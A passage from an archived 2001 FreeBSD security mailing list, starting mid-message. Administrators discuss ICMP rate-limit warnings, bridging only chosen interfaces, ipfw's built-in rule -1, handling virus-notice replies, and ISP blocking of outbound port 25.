Clark cjclark@alum.mit.edu > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 23:32:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from castle.dreaming.org (castle.dreaming.org [216.221.214.170]) by hub.freebsd.org (Postfix) with ESMTP id DDEB137B718; Tue, 13 Mar 2001 23:32:11 -0800 (PST) (envelope-from mit@mitayai.net) Received: (from root@localhost) by castle.dreaming.org (8.11.2/8.11.2) id f2E7WBx78903; Wed, 14 Mar 2001 02:32:11 -0500 (EST) (envelope-from mit@mitayai.net) Received: from cr592943a (cr592943-a.bloor1.on.wave.home.com [24.156.38.199]) by castle.dreaming.org (8.11.2/8.11.2av) with SMTP id f2E7W9t78895; Wed, 14 Mar 2001 02:32:09 -0500 (EST) (envelope-from mit@mitayai.net) 
From: "Will Mitayai Keeso Rowe" To: Cc: Subject: RE: ICMP attacks Date: Wed, 14 Mar 2001 02:29:17 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <980521178.3a7190da7ba07@mail.marketnews.com> X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org i'd love to use snort, but i keep getting this: [castle:root]/usr/ports/security/snort# make -DWITH_MYSQL=yes clean install ===> Cleaning for snort-1.7 ===> Extracting for snort-1.7 >> Checksum OK for snort-1.7.tar.gz. gzip: stdout: Broken pipe ===> Patching for snort-1.7 ===> Configuring for snort-1.7 :-----Original Message----- :From: owner-freebsd-security@FreeBSD.ORG :[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of :mharding@marketnews.com :Sent: January 26, 2001 10:00 AM :To: Will Mitayai Keeso Rowe :Cc: freebsd-security@FreeBSD.ORG :Subject: Re: ICMP attacks : : :Try using a Intrusion detection system. Snort works well for me. :If this is :just a port scan it will show a lot of different attack warnings as the :different ports are hit, but it will show what IP is doing it. : :Mason : :Quoting Will Mitayai Keeso Rowe : : :> > icmp-response bandwidth limit 205/200 pps :> > icmp-response bandwidth limit 264/200 pps :> > icmp-response bandwidth limit 269/200 pps :> > icmp-response bandwidth limit 273/200 pps :> > icmp-response bandwidth limit 273/200 pps :> > icmp-response bandwidth limit 271/200 pps :> > icmp-response bandwidth limit 261/200 pps :> > icmp-response bandwidth limit 268/200 pps :> > icmp-response bandwidth limit 205/200 pps :> > icmp-response bandwidth limit 223/200 pps :> :> Is there any way to trace the people that are causing this? 
It's :> becoming a :> daily occurrence and it's beginning to irritate me. :> :> -Mit :> :> :> :> :> :> To Unsubscribe: send mail to majordomo@FreeBSD.org :> with "unsubscribe freebsd-security" in the body of the message :> : : :To Unsubscribe: send mail to majordomo@FreeBSD.org :with "unsubscribe freebsd-security" in the body of the message : : To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 23:42: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from luke.macfat.dk (port3.ds1-taa.adsl.cybercity.dk [212.242.189.68]) by hub.freebsd.org (Postfix) with ESMTP id 0A59137B719 for ; Tue, 13 Mar 2001 23:41:53 -0800 (PST) (envelope-from macfat@macfat.dk) Received: by luke.macfat.dk (Postfix, from userid 1001) id CDFED55416; Wed, 14 Mar 2001 08:41:51 +0100 (CET) Date: Wed, 14 Mar 2001 08:41:51 +0100
From: Rene Pedersen To: Craig Chaney Cc: freebsd-security@freebsd.org Subject: Re: Bridging only 2 interfaces??? Message-ID: <20010314084151.A93208@luke.macfat.dk> References: <001501c0ac43$49dcfe60$a3b746a6@cook> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <001501c0ac43$49dcfe60$a3b746a6@cook>; from cookfire@xmission.com on Tue, Mar 13, 2001 at 09:57:35PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Mar 13, 2001 at 09:57:35PM -0700, Craig Chaney wrote: > I have set up a bridging firewall that has 3 interfaces. One of the > interfaces is the protected side of the machine, one is the internet side of > the machine, and the third is an interface in to my local network for > management purposes. Is it possible to set up the machine to bridge just the > interfaces not connected to the local network? If so how? You should have a look at sysctl net.link.ether.bridge_cfg where you can define which interfaces are bridged eg: sysctl -w net.link.ether.bridge_cfg=fxp0:1,fxp1:1,fxp2:0 which will bridge on fxp0 and fxp1 but not fxp2 // Rene -- Micro$oft is not the answer, Micro$oft is the question, the answer is no. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 0:26: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f155.law7.hotmail.com [216.33.237.155]) by hub.freebsd.org (Postfix) with ESMTP id 02B8437B718 for ; Wed, 14 Mar 2001 00:25:57 -0800 (PST) (envelope-from ntvsunix@hotmail.com) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Wed, 14 Mar 2001 00:25:56 -0800 Received: from 209.53.55.186 by lw7fd.law7.hotmail.msn.com with HTTP; Wed, 14 Mar 2001 08:25:56 GMT X-Originating-IP: [209.53.55.186]
From: "Some Person" To: cookfire@xmission.com, freebsd-security@freebsd.org Subject: Re: Bridging only 2 interfaces??? Date: Wed, 14 Mar 2001 08:25:56 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 14 Mar 2001 08:25:56.0750 (UTC) FILETIME=[646432E0:01C0AC60] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've never done that on FreeBSD (yet) and I do exactly that, with three NICs on OpenBSD 2.8. I'm sure it's just as easily possible with FreeBSD using IPFW... IPF on OpenBSD would change the ruleset completely on the 'bridged' interface/rules file. It's a little tricky at first, but then very easy once you get the concept. And not to forget that the (non-bridged) interface (if you decided to use rules, is to use the normal rule processing and not the contrary for the bridged interfaces). Not trying to push you away from FreeBSD, just trying to help where I can... Best Regards! FreeBSD/OpenBSD - Advocate! > >I have set up a bridging firewall that has 3 interfaces. One of the >interfaces is the protected side of the machine, one is the internet side >of >the machine, and the third is an interface in to my local network for >management purposes. Is it possible to set up the machine to bridge just >the >interfaces not connected to the local network? If so how? > >Thank you > >--Craig > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 0:31:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f113.law7.hotmail.com [216.33.237.113]) by hub.freebsd.org (Postfix) with ESMTP id 2299237B71B for ; Wed, 14 Mar 2001 00:31:41 -0800 (PST) (envelope-from ntvsunix@hotmail.com) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Wed, 14 Mar 2001 00:31:41 -0800 Received: from 209.53.55.186 by lw7fd.law7.hotmail.msn.com with HTTP; Wed, 14 Mar 2001 08:31:40 GMT X-Originating-IP: [209.53.55.186] 
From: "Some Person" To: freebsd-security@freebsd.org Subject: Re: Bridging only 2 interfaces??? Date: Wed, 14 Mar 2001 08:31:40 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 14 Mar 2001 08:31:41.0013 (UTC) FILETIME=[31969050:01C0AC61] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Speaking of that, is it still not possible to filter bridged frames on FreeBSD with IPF? Personally IPF is my preferred choice over IPFW, although of course IPFW does have DUMMYNET.. :) Dunno if that's been changed yet, or if there's any plans for it? In the meanwhile, I've opted for OpenBSD and to be honest, I love it and haven't seen any performance penalty at all... I use FreeBSD for all other things too, but think would be kewl to have this in FreeBSD as well... Thanks. > >On Tue, Mar 13, 2001 at 09:57:35PM -0700, Craig Chaney wrote: > > I have set up a bridging firewall that has 3 interfaces. One of the > > interfaces is the protected side of the machine, one is the internet >side of > > the machine, and the third is an interface in to my local network for > > management purposes. Is it possible to set up the machine to bridge just >the > > interfaces not connected to the local network? If so how? > >You should have a look at sysctl net.link.ether.bridge_cfg where you can >define which interfaces that are bridged > >eg: sysctl -w net.link.ether.bridge_cfg: fxp0:1,fxp1:1,fxp2:0, >which will bridge on fxp0 and fxp1 but not fxp2 > >// Rene > >-- >Micro$oft is not the answer, Micro$oft is the question, the answer is no. > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 0:47:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from agora.rdrop.com (agora.rdrop.com [199.2.210.241]) by hub.freebsd.org (Postfix) with ESMTP id 4791837B718 for ; Wed, 14 Mar 2001 00:47:35 -0800 (PST) (envelope-from alan@agora.rdrop.com) Received: (from alan@localhost) by agora.rdrop.com (8.11.1/8.11.1) id f2E8mCg01662; Wed, 14 Mar 2001 00:48:12 -0800 (PST) Date: Wed, 14 Mar 2001 00:48:12 -0800 
From: Alan Batie To: Chris Byrnes Cc: cjclark@alum.mit.edu, security@FreeBSD.ORG Subject: Re: ipfw rule -1? Message-ID: <20010314004812.A1528@agora.rdrop.com> Mail-Followup-To: Chris Byrnes , cjclark@alum.mit.edu, security@FreeBSD.ORG References: <20010313232014.B496@cjc-desktop.users.reflexcom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from chris@jeah.net on Wed, Mar 14, 2001 at 01:28:59AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Mar 14, 2001 at 01:28:59AM -0600, Chris Byrnes wrote: > I think it'd be nice to see it in the manpage right underneath the "Fine > Point" you pasted. I agree, as there's no indication from the ipfw log that it was that case that triggered it. -- Alan Batie ______ www.rdrop.com/users/alan Me alan@batie.org \ / www.qrd.org The Triangle PGPFP DE 3C 29 17 C0 49 7A \ / www.pgpi.com The Weird Numbers 27 40 A5 3C 37 4A DA 52 B9 \/ www.anti-spam.net NO SPAM! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 14 5: 8:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from mgateway.borderware.com (mgateway.borderware.com [207.236.65.231]) by hub.freebsd.org (Postfix) with ESMTP id 4979B37B71A for ; Wed, 14 Mar 2001 05:08:19 -0800 (PST) (envelope-from bmw@borderware.com) 
From: "Bruce M. Walker"
Message-Id: <200103141308.f2ED84E11909@fusion.borderware.com>
Subject: Re: Sophos and Virus return mail
In-Reply-To: from Jim Durham at "Mar 13, 2001 11:54:01 pm"
To: Jim Durham
Date: Wed, 14 Mar 2001 08:08:04 -0500 (EST)
Cc: freebsd-security@freebsd.org
X-Mailer: ELM [version 2.4ME+ PL66 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Jim Durham wrote:
>
> I thought of rewriting the script to use the "From: " address
> to reply. I think that would usually work, but I'm not sure
> that address always appears either.

Unhappily not:

    From: Hahaha

You can see the IP of the host that sent it to you in the Received:
headers if you inspect them, but that will be simply the Windows
PC that itself has been infected. Snowhite contains a complete
SMTP send-only implementation and it delivers to its targets directly.

I'm afraid you're stuck with these things.

(This is one case where blocking of port 25 by ISPs is a good thing.)

-bmw

From owner-freebsd-security Wed Mar 14 05:27:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id 4C1E637B71A for ; Wed, 14 Mar 2001 05:27:39 -0800 (PST) (envelope-from rjh@mohawk.net)
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id IAA06919; Wed, 14 Mar 2001 08:42:23 -0500 (EST) (envelope-from rjh@mohawk.net)
Date: Wed, 14 Mar 2001 08:42:23 -0500 (EST)
From: Ralph Huntington
To: "Bruce M. Walker"
Cc: Jim Durham , freebsd-security@FreeBSD.ORG
Subject: Re: Sophos and Virus return mail
In-Reply-To: <200103141308.f2ED84E11909@fusion.borderware.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> (This is one case where blocking of port 25 by ISPs is a good thing.)

If port 25 is blocked, then how is legitimate mail accepted?

-=r=-

From owner-freebsd-security Wed Mar 14 05:33:14 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mgateway.borderware.com (mgateway.borderware.com [207.236.65.231]) by hub.freebsd.org (Postfix) with ESMTP id 83D6537B719 for ; Wed, 14 Mar 2001 05:33:11 -0800 (PST) (envelope-from bmw@borderware.com)
From: "Bruce M. Walker"
Message-Id: <200103141333.f2EDX0J19096@fusion.borderware.com>
Subject: Re: Sophos and Virus return mail
In-Reply-To: from Ralph Huntington at "Mar 14, 2001 08:42:23 am"
To: Ralph Huntington
Date: Wed, 14 Mar 2001 08:33:00 -0500 (EST)
Cc: "Bruce M. Walker" , Jim Durham , freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL66 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Ralph Huntington wrote:
> > (This is one case where blocking of port 25 by ISPs is a good thing.)
>
> If port 25 is blocked, then how is legitimate mail accepted? -=r=-

[The instant I hit the "send" key, I knew I should have clarified! :-]

I meant, of course, blocking of port 25 to all destinations but the
"officially sanctioned mail server". ISPs generally provide you
with a mail server IP which you are supposed to forward all mail
to. Forcing all customers to go through that helps (a little) to
prevent spamming via open relays. Yes, it annoys some, but clients
with dynamic addresses on DSL/cable modems usually don't care.

(Veering dangerously OT now...)

-bmw

From owner-freebsd-security Wed Mar 14 06:27:57 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id 7EB7F37B718 for ; Wed, 14 Mar 2001 06:27:55 -0800 (PST) (envelope-from rjh@mohawk.net)
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id JAA08446; Wed, 14 Mar 2001 09:42:54 -0500 (EST) (envelope-from rjh@mohawk.net)
Date: Wed, 14 Mar 2001 09:42:54 -0500 (EST)
From: Ralph Huntington
To: "Bruce M. Walker"
Cc: Jim Durham , freebsd-security@FreeBSD.ORG
Subject: Re: Sophos and Virus return mail
In-Reply-To: <200103141333.f2EDX0J19096@fusion.borderware.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > > (This is one case where blocking of port 25 by ISPs is a good thing.)
> >
> > If port 25 is blocked, then how is legitimate mail accepted? -=r=-
>
> I meant, of course, blocking of port 25 to all destinations but the
> "officially sanctioned mail server". ISPs generally provide you
> with a mail server IP which you are supposed to forward all mail
> to. Forcing all customers to go through that helps (a little) to
> prevent spamming via open relays. Yes, it annoys some, but clients
> with dynamic addresses on DSL/cable modems usually don't care.

Okay, so you meant blocking the 'escape' of packets bound for port 25 on
any machine *other*than* the approved smtp host, which, of course, does
not relay, correct?

From owner-freebsd-security Wed Mar 14 06:59:34 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mgateway.borderware.com (mgateway.borderware.com [207.236.65.231]) by hub.freebsd.org (Postfix) with ESMTP id 1947037B71B for ; Wed, 14 Mar 2001 06:59:30 -0800 (PST) (envelope-from bmw@borderware.com)
From: "Bruce M. Walker"
Message-Id: <200103141459.f2EExFI21502@fusion.borderware.com>
Subject: Re: Sophos and Virus return mail
In-Reply-To: from Ralph Huntington at "Mar 14, 2001 09:42:54 am"
To: Ralph Huntington
Date: Wed, 14 Mar 2001 09:59:15 -0500 (EST)
Cc: "Bruce M. Walker" , Jim Durham , freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL66 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Ralph Huntington wrote:
> > > If port 25 is blocked, then how is legitimate mail accepted? -=r=-
> >
> > I meant, of course, blocking of port 25 to all destinations but the
> > "officially sanctioned mail server". ISPs generally provide you
> > with a mail server IP which you are supposed to forward all mail
> > to.
>
> Okay, so you meant blocking the 'escape' of packets bound for port 25 on
> any machine *other*than* the approved smtp host, which, of course, does
> not relay, correct?

Not *quite*: the approved SMTP mail server *must* be able to relay,
otherwise you (the customer) wouldn't be able to address mail to
anybody other than people with addresses at your ISP.

Maybe the context isn't clear: I'm referring to blocking being done
by your ISP (ie: your employer, your upstream provider, whatever).
This hypothetical ISP will filter packets destined for port 25 at any
IP-addr except for connections to, say, mail.big-isp.net, their own
mailserver. Then they instruct you (the customer) that when you setup
MS Lookout! or Eudora, that you must specify mail.big-isp.net as the
SMTP server. Your mail client then forwards all outgoing mail to
mail.big-isp.net, and that server forwards your mail to the actual
destination. So mail.big-isp.net gets all the outgoing mail traffic
from the entire ISP's user community and forwards it to the addressees.

Nobody is allowed (in this gated community :-) to connect SMTP directly
from their Windoze box to the remote mailserver (or MX host) of their
addressee.

An example, I believe, is Mindspring who recently announced that they
would start blocking outgoing attempts to connect to port 25. The point
is to stop spammers in their user community from abusing open relays.

Now, how did this go from "Snowhite and the Empty Envelope-from" to
"Packet-filtering by the Big Bad Wolf"? :-)

-bmw

From owner-freebsd-security Wed Mar 14 08:06:02 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 9606637B718 for ; Wed, 14 Mar 2001 08:05:58 -0800 (PST) (envelope-from freebsd@gndrsh.dnsmgr.net)
Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id IAA47316; Wed, 14 Mar 2001 08:05:25 -0800 (PST) (envelope-from freebsd)
From: "Rodney W. Grimes"
Message-Id: <200103141605.IAA47316@gndrsh.dnsmgr.net>
Subject: Re: ipfw rule -1?
In-Reply-To: <20010313232014.B496@cjc-desktop.users.reflexcom.com> from "Crist J. Clark" at "Mar 13, 2001 11:20:14 pm"
To: cjclark@alum.mit.edu
Date: Wed, 14 Mar 2001 08:05:25 -0800 (PST)
Cc: alan@batie.org (Alan Batie), security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL54 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> On Tue, Mar 13, 2001 at 08:40:20AM -0800, Alan Batie wrote:
> > I'm seeing a few of these in my ipfw log and was wondering what rule -1 is?
> > I couldn't find anything about it in the man page...
> >
> > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> > > ipfw: -1 Refuse TCP 62.29.124.91:97 199.2.210.241:29540 in via etha16
> > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
>
> The manpage does not go as far as to indicate that this is rule -1,
> but it does say this happens,
>
> FINE POINTS
>      o There is one kind of packet that the firewall will always discard,
>        that is a TCP packet's fragment with a fragment offset of one. This
>        is a valid packet, but it only has one use, to try to circumvent
>        firewalls.
>
> Rule -1 is given for any packet dropped, but not dropped due to a user
> rule or the default rule. A quick look at the source indicates the
> above pseudo-rule and some other fragment issues (bogusfrag) are the
> only such situations.
>
> OK, I've answered this one enough times now. Should I send in a PR
> with patch to the manpage or is this for the FAQ?

Patch the manpage, and the FAQ. Specifically mention the rule number -1
as being a builtin unalterable set of rules, and describe exactly what those
rules are.

Thanks,
-- 
Rod Grimes - KD7CAX @ CN85sl - (RWG25)                 rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Wed Mar 14 08:12:49 2001
Delivered-To: freebsd-security@freebsd.org
Received: from orestes.cs.brandeis.edu (orestes.cs.brandeis.edu [129.64.3.188]) by hub.freebsd.org (Postfix) with ESMTP id 6481237B718 for ; Wed, 14 Mar 2001 08:12:45 -0800 (PST) (envelope-from meshko@orestes.cs.brandeis.edu)
Received: from localhost (meshko@localhost) by orestes.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id LAA03889; Wed, 14 Mar 2001 11:12:29 -0500
Date: Wed, 14 Mar 2001 11:12:29 -0500 (EST)
From: Mikhail Kruk
To: "Rodney W. Grimes"
Cc: , Alan Batie ,
Subject: Re: ipfw rule -1?
In-Reply-To: <200103141605.IAA47316@gndrsh.dnsmgr.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > Rule -1 is given for any packet dropped, but not dropped due to a user
> > rule or the default rule. A quick look at the source indicates the
> > above pseudo-rule and some other fragment issues (bogusfrag) are the
> > only such situations.
> >
> > OK, I've answered this one enough times now. Should I send in a PR
> > with patch to the manpage or is this for the FAQ?
>
> Patch the manpage, and the FAQ. Specifically mention the rule number -1
> as being a builtin unalterable set of rules, and describe exactly what those
> rules are.

Looks like a docs thread, not a security one, but I'll stick in my 2 cents...
I don't think that something that is in a man page and can be easily found
in it without even reading the whole thing (search for -1?) belongs in the
FAQ. The FAQ is for problems which are not easily solved using man because
it's unclear where to look for the answer, IMHO.
I vote for man page only.

> Thanks,
> --
> Rod Grimes - KD7CAX @ CN85sl - (RWG25)                 rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Wed Mar 14 08:30:49 2001
Delivered-To: freebsd-security@freebsd.org
Received: from w2xo.pgh.pa.us (18.gibs5.xdsl.nauticom.net [209.195.184.19]) by hub.freebsd.org (Postfix) with ESMTP id 7B0F237B719 for ; Wed, 14 Mar 2001 08:30:40 -0800 (PST) (envelope-from durham@w2xo.pgh.pa.us)
Received: from shazam (shazam [192.168.5.3]) by w2xo.pgh.pa.us (8.11.2/8.9.3) with ESMTP id f2EGTmq44176; Wed, 14 Mar 2001 16:29:52 GMT (envelope-from durham@w2xo.pgh.pa.us)
Date: Wed, 14 Mar 2001 11:31:05 -0500 (EST)
From: Jim Durham
X-Sender: durham@shazam.int
To: "Bruce M. Walker"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Sophos and Virus return mail
In-Reply-To: <200103141308.f2ED84E11909@fusion.borderware.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 14 Mar 2001, Bruce M. Walker wrote:

> Jim Durham wrote:
> >
> > I thought of rewriting the script to use the "From: " address
> > to reply. I think that would usually work, but I'm not sure
> > that address always appears either.
>
> Unhappily not:
>
>     From: Hahaha
>
> You can see the IP of the host that sent it to you in the Received:
> headers if you inspect them, but that will be simply the Windows
> PC that itself has been infected. Snowhite contains a complete
> SMTP send-only implementation and it delivers to its targets directly.
>
> I'm afraid you're stuck with these things.
>
> (This is one case where blocking of port 25 by ISPs is a good thing.)
>
> -bmw

Yes, SnowWhite is probably a bad example, as, like you say, it doesn't
generate a replyable "From:" address.

I didn't ask my question correctly. Some viruses generate no envelope
"from" but *do* generate a "From: ". I was thinking about the
ramifications of changing the script to use the "From: " if the
envelope is not there.

SO...

    if (from) ...        reply to from
    else if (From: )     reply to From:
    else                 reply to MAILER-DAEMON (sigh...)

Another thing that might be done is ... and I've done this by hand a
couple times, which gets old... dig out the "ppp-4027dialup@bigisp.net"
and the time from the headers and generate a reply to:
"abuse@bigisp.net", giving the time of the abuse and the dialup.

Maybe if we started using

Sadly, I don't think ISPs pay much attention to "abuse" e-mail, though.
(Another sigh). I've never gotten a response to an abuse report.

This "Virus in your mail to:" stuff gets old..

Yes, I knew what you meant about port 25.. no need to explain. Brains
are much faster than fingers..

Jim Durham

From owner-freebsd-security Wed Mar 14 08:36:53 2001
Delivered-To: freebsd-security@freebsd.org
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 7C31537B71A for ; Wed, 14 Mar 2001 08:36:51 -0800 (PST) (envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id LAA49036; Wed, 14 Mar 2001 11:36:37 -0500 (EST) (envelope-from wollman)
Date: Wed, 14 Mar 2001 11:36:37 -0500 (EST)
From: Garrett Wollman
Message-Id: <200103141636.LAA49036@khavrinen.lcs.mit.edu>
To: Jim Durham
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Sophos and Virus return mail
In-Reply-To:
References: <200103141308.f2ED84E11909@fusion.borderware.com>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

< said:

>     if (from) ...        reply to from
>     else if (From: )     reply to From:
>     else                 reply to MAILER-DAEMON (sigh...)

Better choice:

    send_notice_to(envelope_destination);
    drop_message();

-GAWollman

-- 
Garrett A. Wollman    | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu   | O Siem / The fires of freedom
Opinions not those of | Dance in the burning flame
MIT, LCS, CRS, or NSA |                     - Susan Aglukark and Chad Irschick

From owner-freebsd-security Wed Mar 14 08:45:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id 546D437B71A for ; Wed, 14 Mar 2001 08:45:12 -0800 (PST) (envelope-from freebsd@gndrsh.dnsmgr.net)
Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id IAA47445; Wed, 14 Mar 2001 08:45:00 -0800 (PST) (envelope-from freebsd)
From: "Rodney W. Grimes"
Message-Id: <200103141645.IAA47445@gndrsh.dnsmgr.net>
Subject: Re: ipfw rule -1?
In-Reply-To: from Mikhail Kruk at "Mar 14, 2001 11:12:29 am"
To: meshko@cs.brandeis.edu (Mikhail Kruk)
Date: Wed, 14 Mar 2001 08:45:00 -0800 (PST)
Cc: cjclark@alum.mit.edu, alan@batie.org (Alan Batie), security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL54 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> > > Rule -1 is given for any packet dropped, but not dropped due to a user
> > > rule or the default rule. A quick look at the source indicates the
> > > above pseudo-rule and some other fragment issues (bogusfrag) are the
> > > only such situations.
> > >
> > > OK, I've answered this one enough times now. Should I send in a PR
> > > with patch to the manpage or is this for the FAQ?
> >
> > Patch the manpage, and the FAQ. Specifically mention the rule number -1
> > as being a builtin unalterable set of rules, and describe exactly what those
> > rules are.
>
> Looks like a docs thread, not a security one, but I'll stick in my 2 cents...
> I don't think that something that is in a man page and can be easily found
> in it without even reading the whole thing (search for -1?) belongs in the
> FAQ. The FAQ is for problems which are not easily solved using man because
> it's unclear where to look for the answer, IMHO.
> I vote for man page only.

90% of what is in the FAQ can be found in man pages. If we apply your
reasoning to the FAQ we could reduce it to 1/10th its current size :-)

-- 
Rod Grimes - KD7CAX @ CN85sl - (RWG25)                 rgrimes@gndrsh.dnsmgr.net

From owner-freebsd-security Wed Mar 14 12:16:48 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 899F137B71A for ; Wed, 14 Mar 2001 12:16:40 -0800 (PST) (envelope-from Gerhard.Sittig@gmx.net)
Received: (qmail 5833 invoked by uid 0); 14 Mar 2001 20:16:38 -0000
Received: from p3ee20a8c.dip.t-dialin.net (HELO speedy.gsinet) (62.226.10.140) by mail.gmx.net (mp022-rz3) with SMTP; 14 Mar 2001 20:16:38 -0000
Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id TAA22480 for freebsd-security@freebsd.org; Wed, 14 Mar 2001 19:18:31 +0100
